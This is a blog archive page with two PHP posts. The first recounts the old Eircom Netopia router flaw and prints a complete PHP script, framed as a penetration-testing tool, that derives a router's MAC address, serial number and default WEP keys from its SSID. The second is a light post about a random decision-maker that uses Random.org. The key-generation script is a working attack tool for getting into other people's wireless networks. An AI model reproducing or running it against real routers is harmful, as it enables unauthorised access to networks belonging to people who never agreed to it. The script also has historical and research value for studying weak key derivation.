Tag Archives: php

The old Eircom security snafu…

Leave a reply

A few years back there was a serious security mishap when a smart chap by the name of Kevin Devine reverse engineered a tool that was used to reset the Netopia brand of routers used by Eircom in Ireland to the factory default settings. This application conveniently showed how the WEP key was essentially generated from the MAC address.

When the details of this algorithm was released, I set forward and wrote a small PHP script that could ascertain the WEP key from the SSID of the network… after accomplishing this task I promptly set about forgetting it and moving on to other things that were equally forgettable… I’ve recently rediscovered the code I wrote and here it is…

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80

<?php 
 
/* 
EIRWEP.INC.PHP 
 
BACKGROUND: 
    EIRWEP.INC.PHP WAS WRITTEN BY STEVEN MOUGHAN FOR THE PHISHBONE.ORG GROUP ON 25TH & 26TH OF JUNE 08. 
    IT IS BASED ON DETAILS OF THE HASHING ALGORYTHM THAT WERE PUBLISHED BY KEVIN DEVINE. THE ORIGINAL 
    DETAILS AND SOURCE CODE OF THE EXPLOIT WERE AVAILABLE AT THE TIME OF WRITING FROM 
    HTTP://WEISS.U40.HOSTING.DIGIWEB.IE/NETOPIA/KEYGEN.HTML 
 
    STEVEN MOUGHAN OR HACKDEV.COM CLAIM NO CREDIT FOR THE DISCOVERY OF THIS EXPLOIT, ONLY FOR THIS FILE. 
 
DISCLAIMER: 
    THE AUTHOR, HOST OR DISTRIBUTER OF THIS TOOL WILL ACCEPT NO RESPONSIBILITY FOR MISS USE. 
    THIS SOFTWARE IS DESTRIBUTED AS A PENETRATION TESTING TOOL ONLY. IT IS NOT INTENDED FOR  
    USE IN ORDER TO GAIN UNAUTHORISED ACCESS INTO ANY NETWORK.  
 
USAGE: 
    INCLUDE EIRWEP.INC.PHP INTO ANY OTHER PHP SCRIPT AND CALL THE FUNCTION getKey() WITH THE 
    SSID ARGUMENT. THE SSID SHOULD CONTAIN ONLY 8 DIGITS, NO LETTERS, NO SYMBOLS. THE getKey 
    FUNCTION WILL RETURN AN ARRAY. THE ARRAY HAS THE FOLLOWING ENTRIES. 
 
    ARRAY['mac'] -> THE MAC ADDRESS OF THE ROUTER 
    ARRAY['ser'] -> THE SERIAL OF THE ROUTER 
    ARRAY['key'][0-3] -> WEP KEYS 1->4 
 
EXAMPLE: 
    <?php require('./eirwep.inc.php'); print_r getKey(12345678); ?> 
*/ 
 
    if(!function_exists('str_split')) { 
        function str_split($string, $split_length = 1) { 
            $array = explode("\r\n", chunk_split($string, $split_length)); 
            array_pop($array); 
            return $array; 
        } 
    } 
 
    function getKey($ssid) { 
        $digits = array("Zero","One","Two","Three","Four","Five","Six","Seven","Eight","Nine"); 
        $lyrics[0] = "Although your world wonders me, "; 
        $lyrics[1] = "with your superior cackling hen,"; 
        $lyrics[2] = "Your people I do not understand,"; 
        $lyrics[3] = "So to you I shall put an end and"; 
        $lyrics[4] = "You'll never hear surf music aga"; 
        $lyrics[5] = "Strange beautiful grassy green, "; 
        $lyrics[6] = "With your majestic silver seas, "; 
        $lyrics[7] = "Your mysterious mountains I wish"; 
 
        $ssid = octdec($ssid);         
        $retvar = ''; 
        $mac = $ssid ^ 4044; 
        $tmp = '000fcc' . dechex($mac); 
        $tmpa = str_split($tmp,2); 
        $tmp = "$tmpa[0]:$tmpa[1]:$tmpa[2]:$tmpa[3]:$tmpa[4]:$tmpa[5]"; 
        $tmp = strtoupper($tmp); 
        $retvar['mac'] = $tmp; 
        $serial = $mac + 16777216; 
        $retvar['ser'] = $serial; 
        $chars =str_split($serial); 
 
        for($i=0; $i<8;$i++) { 
            $text .= $digits[$chars[$i]]; 
        }//end for 
 
        for($i=0;$i<=7;$i++) { 
            $appended[$i] = $text . $lyrics[$i]; 
            $cipher .= sha1($appended[$i]);         
        }//end for 
 
        $tmp = str_split($cipher, 26); 
 
        for($i=0; $i<4; $i++) { 
            $retvar['key'][$i] = strtoupper($tmp[$i]); 
        } 
 
        return $retvar; 
    }//end function getKey 
?>

Using the universe to generate numbers…

Leave a reply

I’ve often been stuck trying to make a decision, a pretty straight forward thing to do; in fact, I would say I do it often… but sometimes you just cant decide if it should be pizza or noodles, to work or play, all relatively simple decisions that can often be the most difficult to make.

After a while of going back and forward trying to decide what kind of take out food to eat with my girlfriend, and getting nowhere while I add; I made a decision to write some very simple software. I took a few moments to populate an array with the options, and generated a random integer using PHP’s rand() function with a limit of 0->count($options) and figured we would just order whatever the program told us to, relieving us of the simple decision that became oh so complicated.

Unfortunately there was a small problem, you see my girlfriend is in fact a girl; and when the program ran it gave us an answer, but alas it wasn’t the answer my girlfriend wanted and we resorted to running the program over and over until eventually it came back with the option that my missus really wanted, but wouldn’t make the call on.

So aside from a few wetware problems, the software was a success. In fact I amended it to make other decisions for me that my feeble mind deemed too important. I wouldn’t rely on it for making any important decisions, but it’s fine for the occasional surprising mental blocks I’ve known to accept as part of my minds inner workings.

I played around then on Google, looking for other random decision generators and found quite a few, but then I remembered something from a few years back… Random.org. I had played with it before on a few occasions when I wanted to generate random numbers for various tasks and recalled it having a very simple web based interface that can be called from within PHP and with that, the idea of Decidinator was born.

Decidinator is a simple PHP script I wrote that allows you to enter a question, and up to ten possible answers, it then uses Random.org to generate random numbers that will determine the outcome. If it sounds like overkill now, just wait until you find out how they generate their random numbers…

The Random.org service provides a whole plethora of options for generating random outcomes, entirely based on the background radiation of the universe as a whole. As particles of space dust float around and crash into each other, some will electromagnetic pulses as radio waves; as gases get ionized by the sun and other stars, they will also generate radio interference; just think of what all of that noise is when you tune your radio in between the stations and listen to the “static”… They take all of this and use it to generate random numbers.

There you have it, my little script to make little decisions for me as to what to put in my big mouth is now not only a little bit overkill; it’s awesome. The next time you have to make a simple decision of what to eat or what film to watch, why not leave it to chance and Ask the Universe?